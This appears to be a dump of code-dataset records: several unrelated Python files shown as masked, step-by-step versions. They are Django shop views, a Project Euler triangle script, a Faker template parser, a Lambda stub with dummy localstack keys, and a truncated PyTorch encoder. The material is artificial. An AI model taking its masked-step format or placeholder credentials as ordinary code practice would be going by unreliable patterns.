        existing = mark.objects.get(computer_id__computer_id=computer_id,
                                    user_id__user_id=user_id)
        existing.delete()
    except ObjectDoesNotExist:
        computer = get_object_or_404(Computer, pk=computer_id)
        user = get_object_or_404(User, pk=user_id)
        mark(computer_id=computer, user_id=user).save()
    return HttpResponseRedirect(reverse('shop:computerDetail', args=(computer_id, )))
|
normal
|
{
"blob_id": "18689741a33e6d17e694ee0619a1f36d8d178cbb",
"index": 3223,
"step-1": "<mask token>\n\n\n@transaction.atomic\ndef computers(request):\n ctx = {}\n computer = Computer.objects.all()\n ctx['brand'] = Brand.objects.all()\n if request.method == 'POST':\n if request.POST['computer_id'] != '':\n computer = computer.filter(computer_id__icontains=request.POST[\n 'computer_id'])\n if request.POST['cpu'] != '':\n computer = computer.filter(cpu__icontains=request.POST['cpu'])\n if request.POST['graphics_card'] != '':\n computer = computer.filter(graphics_card__icontains=request.\n POST['graphics_card'])\n try:\n if request.POST['minMemory'] != '':\n computer = computer.filter(memory__gte=int(request.POST[\n 'minMemory']))\n if request.POST['maxMemory'] != '':\n computer = computer.exclude(memory__gte=int(request.POST[\n 'maxMemory']))\n if request.POST['minssd'] != '':\n computer = computer.filter(ssd_capacity__gte=int(request.\n POST['minssd']))\n if request.POST['maxssd'] != '':\n computer = computer.exclude(ssd_capacity__gte=int(request.\n POST['maxssd']))\n if request.POST['minDisk'] != '':\n computer = computer.filter(disk_capacity__gte=int(request.\n POST['minDisk']))\n if request.POST['maxDisk'] != '':\n computer = computer.exclude(disk_capacity__gte=int(request.\n POST['maxDisk']))\n except ValueError:\n return render(request, 'Dashio/error.html', {'error': '请输入整数'})\n if request.POST.get('brand', '') != '':\n print(request.POST['brand'])\n computer = computer.filter(brand__name__icontains=request.POST[\n 'brand'])\n if request.POST['sort'] != '':\n sortKey = request.POST['sortType'] + request.POST['sort']\n computer = computer.order_by(sortKey)\n ctx['computer'] = computer\n return render(request, 'Dashio/computers.html', ctx)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@transaction.atomic\ndef computers(request):\n ctx = {}\n computer = Computer.objects.all()\n ctx['brand'] = Brand.objects.all()\n if request.method == 'POST':\n if request.POST['computer_id'] != '':\n computer = computer.filter(computer_id__icontains=request.POST[\n 'computer_id'])\n if request.POST['cpu'] != '':\n computer = computer.filter(cpu__icontains=request.POST['cpu'])\n if request.POST['graphics_card'] != '':\n computer = computer.filter(graphics_card__icontains=request.\n POST['graphics_card'])\n try:\n if request.POST['minMemory'] != '':\n computer = computer.filter(memory__gte=int(request.POST[\n 'minMemory']))\n if request.POST['maxMemory'] != '':\n computer = computer.exclude(memory__gte=int(request.POST[\n 'maxMemory']))\n if request.POST['minssd'] != '':\n computer = computer.filter(ssd_capacity__gte=int(request.\n POST['minssd']))\n if request.POST['maxssd'] != '':\n computer = computer.exclude(ssd_capacity__gte=int(request.\n POST['maxssd']))\n if request.POST['minDisk'] != '':\n computer = computer.filter(disk_capacity__gte=int(request.\n POST['minDisk']))\n if request.POST['maxDisk'] != '':\n computer = computer.exclude(disk_capacity__gte=int(request.\n POST['maxDisk']))\n except ValueError:\n return render(request, 'Dashio/error.html', {'error': '请输入整数'})\n if request.POST.get('brand', '') != '':\n print(request.POST['brand'])\n computer = computer.filter(brand__name__icontains=request.POST[\n 'brand'])\n if request.POST['sort'] != '':\n sortKey = request.POST['sortType'] + request.POST['sort']\n computer = computer.order_by(sortKey)\n ctx['computer'] = computer\n return render(request, 'Dashio/computers.html', ctx)\n\n\n<mask token>\n\n\n@transaction.atomic\ndef post(request, user_id, computer_id):\n if request.method == 'POST':\n computer = Computer.objects.get(pk=computer_id)\n user = User.objects.get(pk=user_id)\n computer_comment(computer_id=computer, user_id=user, content=\n request.POST['comment']).save()\n 
return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n\n\ndef makeMark(request, computer_id, user_id):\n try:\n m = mark.objects.get(computer_id__computer_id=computer_id,\n user_id__user_id=user_id)\n m.delete()\n except ObjectDoesNotExist:\n computer = get_object_or_404(Computer, pk=computer_id)\n user = get_object_or_404(User, pk=user_id)\n mark(computer_id=computer, user_id=user).save()\n return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n",
"step-3": "<mask token>\n\n\n@transaction.atomic\ndef computers(request):\n ctx = {}\n computer = Computer.objects.all()\n ctx['brand'] = Brand.objects.all()\n if request.method == 'POST':\n if request.POST['computer_id'] != '':\n computer = computer.filter(computer_id__icontains=request.POST[\n 'computer_id'])\n if request.POST['cpu'] != '':\n computer = computer.filter(cpu__icontains=request.POST['cpu'])\n if request.POST['graphics_card'] != '':\n computer = computer.filter(graphics_card__icontains=request.\n POST['graphics_card'])\n try:\n if request.POST['minMemory'] != '':\n computer = computer.filter(memory__gte=int(request.POST[\n 'minMemory']))\n if request.POST['maxMemory'] != '':\n computer = computer.exclude(memory__gte=int(request.POST[\n 'maxMemory']))\n if request.POST['minssd'] != '':\n computer = computer.filter(ssd_capacity__gte=int(request.\n POST['minssd']))\n if request.POST['maxssd'] != '':\n computer = computer.exclude(ssd_capacity__gte=int(request.\n POST['maxssd']))\n if request.POST['minDisk'] != '':\n computer = computer.filter(disk_capacity__gte=int(request.\n POST['minDisk']))\n if request.POST['maxDisk'] != '':\n computer = computer.exclude(disk_capacity__gte=int(request.\n POST['maxDisk']))\n except ValueError:\n return render(request, 'Dashio/error.html', {'error': '请输入整数'})\n if request.POST.get('brand', '') != '':\n print(request.POST['brand'])\n computer = computer.filter(brand__name__icontains=request.POST[\n 'brand'])\n if request.POST['sort'] != '':\n sortKey = request.POST['sortType'] + request.POST['sort']\n computer = computer.order_by(sortKey)\n ctx['computer'] = computer\n return render(request, 'Dashio/computers.html', ctx)\n\n\n@transaction.atomic\ndef details(request, computer_id):\n rtx = {}\n rtx['isUser'] = request.session['type'] == 'user'\n rtx['computer'] = get_object_or_404(Computer, pk=computer_id)\n rtx['markAmount'] = mark.objects.filter(computer_id__computer_id=\n computer_id).count()\n rtx['sell'] = 
Sell.objects.filter(computer_id__computer_id=computer_id)\n rtx['user_id'] = request.session['id']\n rtx['sellAmount'] = Buy.objects.filter(computer_id__computer_id=computer_id\n ).count()\n rtx['comments'] = computer_comment.objects.filter(computer_id__computer_id\n =computer_id).order_by('-comment_date')\n rtx['buys'] = Buy.objects.filter(computer_id__computer_id=computer_id\n ).order_by('-buy_time')[:5]\n if rtx['isUser']:\n rtx['mark'] = '收藏' if mark.objects.filter(user_id__user_id=rtx[\n 'user_id'], computer_id=rtx['computer']).count() == 0 else '取消收藏'\n return render(request, 'Dashio/computer_detail.html', rtx)\n\n\n@transaction.atomic\ndef post(request, user_id, computer_id):\n if request.method == 'POST':\n computer = Computer.objects.get(pk=computer_id)\n user = User.objects.get(pk=user_id)\n computer_comment(computer_id=computer, user_id=user, content=\n request.POST['comment']).save()\n return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n\n\ndef makeMark(request, computer_id, user_id):\n try:\n m = mark.objects.get(computer_id__computer_id=computer_id,\n user_id__user_id=user_id)\n m.delete()\n except ObjectDoesNotExist:\n computer = get_object_or_404(Computer, pk=computer_id)\n user = get_object_or_404(User, pk=user_id)\n mark(computer_id=computer, user_id=user).save()\n return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n",
"step-4": "from django.shortcuts import *\nfrom shop.models import *\nfrom django.db import transaction\nfrom django.core.exceptions import *\n\n\n@transaction.atomic\ndef computers(request):\n ctx = {}\n computer = Computer.objects.all()\n ctx['brand'] = Brand.objects.all()\n if request.method == 'POST':\n if request.POST['computer_id'] != '':\n computer = computer.filter(computer_id__icontains=request.POST[\n 'computer_id'])\n if request.POST['cpu'] != '':\n computer = computer.filter(cpu__icontains=request.POST['cpu'])\n if request.POST['graphics_card'] != '':\n computer = computer.filter(graphics_card__icontains=request.\n POST['graphics_card'])\n try:\n if request.POST['minMemory'] != '':\n computer = computer.filter(memory__gte=int(request.POST[\n 'minMemory']))\n if request.POST['maxMemory'] != '':\n computer = computer.exclude(memory__gte=int(request.POST[\n 'maxMemory']))\n if request.POST['minssd'] != '':\n computer = computer.filter(ssd_capacity__gte=int(request.\n POST['minssd']))\n if request.POST['maxssd'] != '':\n computer = computer.exclude(ssd_capacity__gte=int(request.\n POST['maxssd']))\n if request.POST['minDisk'] != '':\n computer = computer.filter(disk_capacity__gte=int(request.\n POST['minDisk']))\n if request.POST['maxDisk'] != '':\n computer = computer.exclude(disk_capacity__gte=int(request.\n POST['maxDisk']))\n except ValueError:\n return render(request, 'Dashio/error.html', {'error': '请输入整数'})\n if request.POST.get('brand', '') != '':\n print(request.POST['brand'])\n computer = computer.filter(brand__name__icontains=request.POST[\n 'brand'])\n if request.POST['sort'] != '':\n sortKey = request.POST['sortType'] + request.POST['sort']\n computer = computer.order_by(sortKey)\n ctx['computer'] = computer\n return render(request, 'Dashio/computers.html', ctx)\n\n\n@transaction.atomic\ndef details(request, computer_id):\n rtx = {}\n rtx['isUser'] = request.session['type'] == 'user'\n rtx['computer'] = get_object_or_404(Computer, 
pk=computer_id)\n rtx['markAmount'] = mark.objects.filter(computer_id__computer_id=\n computer_id).count()\n rtx['sell'] = Sell.objects.filter(computer_id__computer_id=computer_id)\n rtx['user_id'] = request.session['id']\n rtx['sellAmount'] = Buy.objects.filter(computer_id__computer_id=computer_id\n ).count()\n rtx['comments'] = computer_comment.objects.filter(computer_id__computer_id\n =computer_id).order_by('-comment_date')\n rtx['buys'] = Buy.objects.filter(computer_id__computer_id=computer_id\n ).order_by('-buy_time')[:5]\n if rtx['isUser']:\n rtx['mark'] = '收藏' if mark.objects.filter(user_id__user_id=rtx[\n 'user_id'], computer_id=rtx['computer']).count() == 0 else '取消收藏'\n return render(request, 'Dashio/computer_detail.html', rtx)\n\n\n@transaction.atomic\ndef post(request, user_id, computer_id):\n if request.method == 'POST':\n computer = Computer.objects.get(pk=computer_id)\n user = User.objects.get(pk=user_id)\n computer_comment(computer_id=computer, user_id=user, content=\n request.POST['comment']).save()\n return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n\n\ndef makeMark(request, computer_id, user_id):\n try:\n m = mark.objects.get(computer_id__computer_id=computer_id,\n user_id__user_id=user_id)\n m.delete()\n except ObjectDoesNotExist:\n computer = get_object_or_404(Computer, pk=computer_id)\n user = get_object_or_404(User, pk=user_id)\n mark(computer_id=computer, user_id=user).save()\n return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n",
"step-5": "from django.shortcuts import *\nfrom shop.models import *\nfrom django.db import transaction\nfrom django.core.exceptions import *\n\n@transaction.atomic\ndef computers(request):\n ctx = {}\n computer = Computer.objects.all()\n ctx['brand'] = Brand.objects.all()\n\n if request.method == 'POST':\n if request.POST['computer_id'] != '':\n computer = computer.filter(computer_id__icontains=request.POST['computer_id'])\n if request.POST['cpu'] != '':\n computer = computer.filter(cpu__icontains=request.POST['cpu'])\n if request.POST['graphics_card'] != '':\n computer = computer.filter(graphics_card__icontains=request.POST['graphics_card'])\n \n try:\n if request.POST['minMemory'] != '':\n computer = computer.filter(memory__gte=int(request.POST['minMemory']))\n if request.POST['maxMemory'] != '':\n computer = computer.exclude(memory__gte=int(request.POST['maxMemory']))\n\n if request.POST['minssd'] != '':\n computer = computer.filter(ssd_capacity__gte=int(request.POST['minssd']))\n if request.POST['maxssd'] != '':\n computer = computer.exclude(ssd_capacity__gte=int(request.POST['maxssd']))\n\n if request.POST['minDisk'] != '':\n computer = computer.filter(disk_capacity__gte=int(request.POST['minDisk']))\n if request.POST['maxDisk'] != '':\n computer = computer.exclude(disk_capacity__gte=int(request.POST['maxDisk']))\n\n except ValueError:\n return render(request, 'Dashio/error.html', {'error': \"请输入整数\"})\n \n if request.POST.get('brand', '') != '':\n print(request.POST['brand'])\n computer = computer.filter(brand__name__icontains=request.POST['brand'])\n\n if request.POST['sort'] != '':\n sortKey = request.POST['sortType'] + request.POST['sort']\n computer = computer.order_by(sortKey)\n\n ctx['computer'] = computer\n return render(request, \"Dashio/computers.html\", ctx)\n\n@transaction.atomic\ndef details(request, computer_id):\n rtx = {}\n rtx['isUser'] = request.session['type'] == 'user'\n rtx['computer'] = get_object_or_404(Computer, pk=computer_id)\n 
rtx['markAmount'] = mark.objects.filter(computer_id__computer_id=computer_id).count()\n rtx['sell'] = Sell.objects.filter(computer_id__computer_id=computer_id)\n rtx['user_id'] = request.session['id']\n rtx['sellAmount'] = Buy.objects.filter(computer_id__computer_id=computer_id).count()\n rtx['comments'] = computer_comment.objects.filter(computer_id__computer_id=computer_id).order_by('-comment_date')\n rtx['buys'] = Buy.objects.filter(computer_id__computer_id=computer_id).order_by('-buy_time')[:5]\n \n if rtx['isUser']:\n rtx['mark'] = ('收藏' if mark.objects.filter(user_id__user_id=rtx['user_id'], computer_id=rtx['computer']).count() == 0 else '取消收藏')\n\n return render(request, 'Dashio/computer_detail.html', rtx)\n\n@transaction.atomic\ndef post(request, user_id, computer_id):\n if request.method == 'POST':\n computer = Computer.objects.get(pk=computer_id)\n user = User.objects.get(pk=user_id)\n computer_comment(computer_id=computer, user_id=user, content=request.POST['comment']).save()\n \n return HttpResponseRedirect(reverse('shop:computerDetail', args=(computer_id, )))\n\ndef makeMark(request, computer_id, user_id):\n try:\n m = mark.objects.get(computer_id__computer_id=computer_id, user_id__user_id=user_id)\n m.delete()\n except ObjectDoesNotExist:\n computer = get_object_or_404(Computer, pk=computer_id)\n user = get_object_or_404(User, pk=user_id)\n mark(computer_id=computer, user_id=user).save()\n \n return HttpResponseRedirect(reverse('shop:computerDetail', args=(computer_id, )))",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
# Project Euler 102 input: one triangle per line as "ax,ay,bx,by,cx,cy".
f=open('p102_triangles.txt')
def cross(a, b, c):
    # 2D cross product of the vectors (b - a) and (c - a).  Its sign says
    # on which side of the line a-b the point c lies; its magnitude is
    # twice the area of triangle abc.
    abx, aby = b[0] - a[0], b[1] - a[1]
    acx, acy = c[0] - a[0], c[1] - a[1]
    return abx * acy - aby * acx
# A triangle contains the origin iff the three sub-triangles it forms with
# the origin have |areas| summing exactly to the triangle's own |area|
# (every cross() value is twice the true area, which cancels out).
origin = (0, 0)
ans = 0
# Iterate the file object directly: file.xreadlines() has long been
# deprecated and was removed in Python 3; plain iteration is the
# equivalent lazy line-by-line read.
for line in f:
    ax, ay, bx, by, cx, cy = map(int, line.split(','))
    x, y, z = (ax, ay), (bx, by), (cx, cy)
    area1 = abs(cross(x, y, z))
    area2 = (abs(cross(x, y, origin)) + abs(cross(y, z, origin))
             + abs(cross(z, x, origin)))
    if area1 == area2:
        ans += 1

# print(value) with a single argument behaves identically on Python 2 and 3.
print(ans)
|
normal
|
{
"blob_id": "c34ff2bbb0ba743268ace77c110ce0b283a25eba",
"index": 8637,
"step-1": "f=open('p102_triangles.txt')\n\ndef cross(a,b,c):\n t1=b[0]-a[0]\n t2=b[1]-a[1]\n t3=c[0]-a[0]\n t4=c[1]-a[1]\n return t1*t4-t2*t3\n\nx=[0,0]\ny=[0,0]\nz=[0,0]\norigin=(0,0)\nans=0\nfor i in f.xreadlines():\n x[0],x[1],y[0],y[1],z[0],z[1]=map(int,i.split(','))\n area1=abs(cross(x,y,z))\n area2=abs(cross(x,y,origin))+abs(cross(y,z,origin))+abs(cross(z,x,origin))\n if area1==area2:\n ans+=1\n\nprint ans\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class TemplateParser:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, template=None, providers=None, date_generator=None):
self.fake = Faker()
self.fake.add_provider(FileDataSourceProvider)
self.fake.add_provider(NumbersProvider)
self.fake.add_provider(InternetProvider)
self.template = template
self.providers = {} if providers is None else providers
self.date_generator = (TemplateParser.null_date_generator if
date_generator is None else date_generator)
<|reserved_special_token_0|>
def process(self, date_generator=None, **kwargs):
"""Procces template, parsing it"""
template = Template(self.template)
if date_generator is None:
date_generator = self.date_generator
return template.render(fake=self.fake, datetime=datetime,
date_generator=date_generator, next=next, **self.providers, **
kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TemplateParser:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, template=None, providers=None, date_generator=None):
self.fake = Faker()
self.fake.add_provider(FileDataSourceProvider)
self.fake.add_provider(NumbersProvider)
self.fake.add_provider(InternetProvider)
self.template = template
self.providers = {} if providers is None else providers
self.date_generator = (TemplateParser.null_date_generator if
date_generator is None else date_generator)
@staticmethod
def null_date_generator():
"""Generate now date"""
return str(datetime.now())
def process(self, date_generator=None, **kwargs):
"""Procces template, parsing it"""
template = Template(self.template)
if date_generator is None:
date_generator = self.date_generator
return template.render(fake=self.fake, datetime=datetime,
date_generator=date_generator, next=next, **self.providers, **
kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TemplateParser:
"""Parser for templates, using jinja2 and Faker"""
fake = None
def __init__(self, template=None, providers=None, date_generator=None):
self.fake = Faker()
self.fake.add_provider(FileDataSourceProvider)
self.fake.add_provider(NumbersProvider)
self.fake.add_provider(InternetProvider)
self.template = template
self.providers = {} if providers is None else providers
self.date_generator = (TemplateParser.null_date_generator if
date_generator is None else date_generator)
@staticmethod
def null_date_generator():
"""Generate now date"""
return str(datetime.now())
def process(self, date_generator=None, **kwargs):
"""Procces template, parsing it"""
template = Template(self.template)
if date_generator is None:
date_generator = self.date_generator
return template.render(fake=self.fake, datetime=datetime,
date_generator=date_generator, next=next, **self.providers, **
kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from datetime import datetime
from jinja2 import Template
from faker import Faker
from faker.providers.internet import Provider as InternetProvider
from ..providers.file_data_source_provider import FileDataSourceProvider
from ..providers.numbers_provider import NumbersProvider
class TemplateParser:
"""Parser for templates, using jinja2 and Faker"""
fake = None
def __init__(self, template=None, providers=None, date_generator=None):
self.fake = Faker()
self.fake.add_provider(FileDataSourceProvider)
self.fake.add_provider(NumbersProvider)
self.fake.add_provider(InternetProvider)
self.template = template
self.providers = {} if providers is None else providers
self.date_generator = (TemplateParser.null_date_generator if
date_generator is None else date_generator)
@staticmethod
def null_date_generator():
"""Generate now date"""
return str(datetime.now())
def process(self, date_generator=None, **kwargs):
"""Procces template, parsing it"""
template = Template(self.template)
if date_generator is None:
date_generator = self.date_generator
return template.render(fake=self.fake, datetime=datetime,
date_generator=date_generator, next=next, **self.providers, **
kwargs)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""Template parser for Faker"""
from datetime import datetime
from jinja2 import Template
from faker import Faker
from faker.providers.internet import Provider as InternetProvider
from ..providers.file_data_source_provider import FileDataSourceProvider
from ..providers.numbers_provider import NumbersProvider
class TemplateParser:
    """Parser for templates, using jinja2 and Faker"""

    fake = None

    def __init__(self, template=None, providers=None, date_generator=None):
        self.fake = Faker()
        # Register the custom data-source/number providers plus Faker's
        # internet provider (IPs, networks, emails, ...).
        for provider_cls in (FileDataSourceProvider, NumbersProvider,
                             InternetProvider):
            self.fake.add_provider(provider_cls)
        self.template = template
        self.providers = providers if providers is not None else {}
        self.date_generator = (date_generator if date_generator is not None
                               else TemplateParser.null_date_generator)

    @staticmethod
    def null_date_generator():
        """Return the current date/time as a string (default date source)."""
        return str(datetime.now())

    def process(self, date_generator=None, **kwargs):
        """Render the template; an explicit date_generator overrides the default."""
        compiled = Template(self.template)
        generator = (date_generator if date_generator is not None
                     else self.date_generator)
        # Only the names passed here are visible inside the template; the
        # built-in `next` is exposed so templates can call next(date_generator).
        return compiled.render(fake=self.fake, datetime=datetime,
                               date_generator=generator, next=next,
                               **self.providers, **kwargs)
|
flexible
|
{
"blob_id": "38f9cddfde4787ead2314fc70c1f4d91a3da9687",
"index": 1307,
"step-1": "<mask token>\n\n\nclass TemplateParser:\n <mask token>\n <mask token>\n\n def __init__(self, template=None, providers=None, date_generator=None):\n self.fake = Faker()\n self.fake.add_provider(FileDataSourceProvider)\n self.fake.add_provider(NumbersProvider)\n self.fake.add_provider(InternetProvider)\n self.template = template\n self.providers = {} if providers is None else providers\n self.date_generator = (TemplateParser.null_date_generator if \n date_generator is None else date_generator)\n <mask token>\n\n def process(self, date_generator=None, **kwargs):\n \"\"\"Procces template, parsing it\"\"\"\n template = Template(self.template)\n if date_generator is None:\n date_generator = self.date_generator\n return template.render(fake=self.fake, datetime=datetime,\n date_generator=date_generator, next=next, **self.providers, **\n kwargs)\n",
"step-2": "<mask token>\n\n\nclass TemplateParser:\n <mask token>\n <mask token>\n\n def __init__(self, template=None, providers=None, date_generator=None):\n self.fake = Faker()\n self.fake.add_provider(FileDataSourceProvider)\n self.fake.add_provider(NumbersProvider)\n self.fake.add_provider(InternetProvider)\n self.template = template\n self.providers = {} if providers is None else providers\n self.date_generator = (TemplateParser.null_date_generator if \n date_generator is None else date_generator)\n\n @staticmethod\n def null_date_generator():\n \"\"\"Generate now date\"\"\"\n return str(datetime.now())\n\n def process(self, date_generator=None, **kwargs):\n \"\"\"Procces template, parsing it\"\"\"\n template = Template(self.template)\n if date_generator is None:\n date_generator = self.date_generator\n return template.render(fake=self.fake, datetime=datetime,\n date_generator=date_generator, next=next, **self.providers, **\n kwargs)\n",
"step-3": "<mask token>\n\n\nclass TemplateParser:\n \"\"\"Parser for templates, using jinja2 and Faker\"\"\"\n fake = None\n\n def __init__(self, template=None, providers=None, date_generator=None):\n self.fake = Faker()\n self.fake.add_provider(FileDataSourceProvider)\n self.fake.add_provider(NumbersProvider)\n self.fake.add_provider(InternetProvider)\n self.template = template\n self.providers = {} if providers is None else providers\n self.date_generator = (TemplateParser.null_date_generator if \n date_generator is None else date_generator)\n\n @staticmethod\n def null_date_generator():\n \"\"\"Generate now date\"\"\"\n return str(datetime.now())\n\n def process(self, date_generator=None, **kwargs):\n \"\"\"Procces template, parsing it\"\"\"\n template = Template(self.template)\n if date_generator is None:\n date_generator = self.date_generator\n return template.render(fake=self.fake, datetime=datetime,\n date_generator=date_generator, next=next, **self.providers, **\n kwargs)\n",
"step-4": "<mask token>\nfrom datetime import datetime\nfrom jinja2 import Template\nfrom faker import Faker\nfrom faker.providers.internet import Provider as InternetProvider\nfrom ..providers.file_data_source_provider import FileDataSourceProvider\nfrom ..providers.numbers_provider import NumbersProvider\n\n\nclass TemplateParser:\n \"\"\"Parser for templates, using jinja2 and Faker\"\"\"\n fake = None\n\n def __init__(self, template=None, providers=None, date_generator=None):\n self.fake = Faker()\n self.fake.add_provider(FileDataSourceProvider)\n self.fake.add_provider(NumbersProvider)\n self.fake.add_provider(InternetProvider)\n self.template = template\n self.providers = {} if providers is None else providers\n self.date_generator = (TemplateParser.null_date_generator if \n date_generator is None else date_generator)\n\n @staticmethod\n def null_date_generator():\n \"\"\"Generate now date\"\"\"\n return str(datetime.now())\n\n def process(self, date_generator=None, **kwargs):\n \"\"\"Procces template, parsing it\"\"\"\n template = Template(self.template)\n if date_generator is None:\n date_generator = self.date_generator\n return template.render(fake=self.fake, datetime=datetime,\n date_generator=date_generator, next=next, **self.providers, **\n kwargs)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Template parser for Faker\"\"\"\nfrom datetime import datetime\nfrom jinja2 import Template\nfrom faker import Faker\nfrom faker.providers.internet import Provider as InternetProvider\nfrom ..providers.file_data_source_provider import FileDataSourceProvider\nfrom ..providers.numbers_provider import NumbersProvider\n\n\nclass TemplateParser:\n \"\"\"Parser for templates, using jinja2 and Faker\"\"\"\n fake = None\n\n def __init__(self, template=None, providers=None, date_generator=None):\n self.fake = Faker()\n self.fake.add_provider(FileDataSourceProvider)\n self.fake.add_provider(NumbersProvider)\n # Ips networks emails etc..\n self.fake.add_provider(InternetProvider)\n self.template = template\n self.providers = {} if providers is None else providers\n self.date_generator = TemplateParser.null_date_generator \\\n if date_generator is None else date_generator\n\n @staticmethod\n def null_date_generator():\n \"\"\"Generate now date\"\"\"\n return str(datetime.now())\n\n def process(self, date_generator=None, **kwargs):\n \"\"\"Procces template, parsing it\"\"\"\n template = Template(self.template)\n\n if date_generator is None:\n date_generator = self.date_generator\n\n # Only the passed objects will be accessible from the template\n # the next built-in needs to be passed for next(date_generator) to work\n return template.render(fake=self.fake, datetime=datetime,\n date_generator=date_generator,\n next=next, **self.providers, **kwargs)\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |
from os import environ
from process import process
from s3Service import put_object
environ['ACCESS_KEY'] = '1234567890'
environ['SECRET_KEY'] = '1234567890'
environ['ENDPOINT_URL'] = 'http://localhost:4566'
environ['REGION'] = 'us-east-1'
environ['BUCKET_GLOBAL'] = 'fl2-statement-global'
environ['BUCKET_GLOBAL_BACKUP'] = 'fl2-statement-global-bkp'
environ['BUCKET_TRANSFER'] = 'fl2-statement-transfer'
environ['BUCKET_PENDING_PROCESS'] = 'fl2-statement-pending-process'
BUCKET_GLOBAL = environ['BUCKET_GLOBAL']
# def test():
#
# file = open('EEVC.TXT', mode='rb')
# put_object(BUCKET_GLOBAL, 'EEVC.TXT', file) # OK
#
# file = open('EEVD.TXT', mode='rb')
# put_object(BUCKET_GLOBAL, 'EEVD.TXT', file) # OK
#
# file = open('EEFI.TXT', mode='rb')
# put_object(BUCKET_GLOBAL, 'EEFI.TXT', file) # OK
#
# file = open('EESA.TXT', mode='rb')
# put_object(BUCKET_GLOBAL, 'EESA.TXT', file) # OK
def execute(event, context):
    """Lambda-style entry point: currently only logs the triggering event.

    Parameters:
        event: the invocation payload (e.g. an S3 notification); only printed.
        context: runtime context object; unused.

    The per-file statement processing is intentionally disabled for now;
    re-enable it by calling process(bucket=..., key=...) for each file, e.g.
    process(bucket=BUCKET_GLOBAL, key='EEVC.TXT').
    """
    print(event)
# Press the green button in the gutter to run the script.
# if __name__ == '__main__':
# test()
# execute(None, None)
|
normal
|
{
"blob_id": "a4eca0f5b7d5a03ca3600554ae3fe3b94c59fc68",
"index": 8622,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef execute(event, context):\n print(event)\n pass\n",
"step-3": "<mask token>\nenviron['ACCESS_KEY'] = '1234567890'\nenviron['SECRET_KEY'] = '1234567890'\nenviron['ENDPOINT_URL'] = 'http://localhost:4566'\nenviron['REGION'] = 'us-east-1'\nenviron['BUCKET_GLOBAL'] = 'fl2-statement-global'\nenviron['BUCKET_GLOBAL_BACKUP'] = 'fl2-statement-global-bkp'\nenviron['BUCKET_TRANSFER'] = 'fl2-statement-transfer'\nenviron['BUCKET_PENDING_PROCESS'] = 'fl2-statement-pending-process'\nBUCKET_GLOBAL = environ['BUCKET_GLOBAL']\n\n\ndef execute(event, context):\n print(event)\n pass\n",
"step-4": "from os import environ\nfrom process import process\nfrom s3Service import put_object\nenviron['ACCESS_KEY'] = '1234567890'\nenviron['SECRET_KEY'] = '1234567890'\nenviron['ENDPOINT_URL'] = 'http://localhost:4566'\nenviron['REGION'] = 'us-east-1'\nenviron['BUCKET_GLOBAL'] = 'fl2-statement-global'\nenviron['BUCKET_GLOBAL_BACKUP'] = 'fl2-statement-global-bkp'\nenviron['BUCKET_TRANSFER'] = 'fl2-statement-transfer'\nenviron['BUCKET_PENDING_PROCESS'] = 'fl2-statement-pending-process'\nBUCKET_GLOBAL = environ['BUCKET_GLOBAL']\n\n\ndef execute(event, context):\n print(event)\n pass\n",
"step-5": "from os import environ\nfrom process import process\nfrom s3Service import put_object\n\nenviron['ACCESS_KEY'] = '1234567890'\nenviron['SECRET_KEY'] = '1234567890'\nenviron['ENDPOINT_URL'] = 'http://localhost:4566'\nenviron['REGION'] = 'us-east-1'\nenviron['BUCKET_GLOBAL'] = 'fl2-statement-global'\nenviron['BUCKET_GLOBAL_BACKUP'] = 'fl2-statement-global-bkp'\nenviron['BUCKET_TRANSFER'] = 'fl2-statement-transfer'\nenviron['BUCKET_PENDING_PROCESS'] = 'fl2-statement-pending-process'\n\nBUCKET_GLOBAL = environ['BUCKET_GLOBAL']\n\n\n# def test():\n#\n# file = open('EEVC.TXT', mode='rb')\n# put_object(BUCKET_GLOBAL, 'EEVC.TXT', file) # OK\n#\n# file = open('EEVD.TXT', mode='rb')\n# put_object(BUCKET_GLOBAL, 'EEVD.TXT', file) # OK\n#\n# file = open('EEFI.TXT', mode='rb')\n# put_object(BUCKET_GLOBAL, 'EEFI.TXT', file) # OK\n#\n# file = open('EESA.TXT', mode='rb')\n# put_object(BUCKET_GLOBAL, 'EESA.TXT', file) # OK\n\n\ndef execute(event, context):\n\n print(event)\n pass\n\n # payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EEVC.TXT'}\n # process(bucket=payload['Bucket'], key=payload['Key'])\n #\n # payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EEVD.TXT'}\n # process(bucket=payload['Bucket'], key=payload['Key'])\n #\n # payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EEFI.TXT'}\n # process(bucket=payload['Bucket'], key=payload['Key'])\n #\n # payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EESA.TXT'}\n # process(bucket=payload['Bucket'], key=payload['Key'])\n\n\n# Press the green button in the gutter to run the script.\n# if __name__ == '__main__':\n# test()\n# execute(None, None)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import torch
import torch.nn as nn
import torch.nn.functional as F
class Encoder(nn.Module):
    """Convolutional feature extractor: 28x28 input -> flat 48*4*4 vector."""

    def __init__(self):
        super(Encoder, self).__init__()
        # Two conv + batch-norm stages; each is followed by ReLU and a 2x2
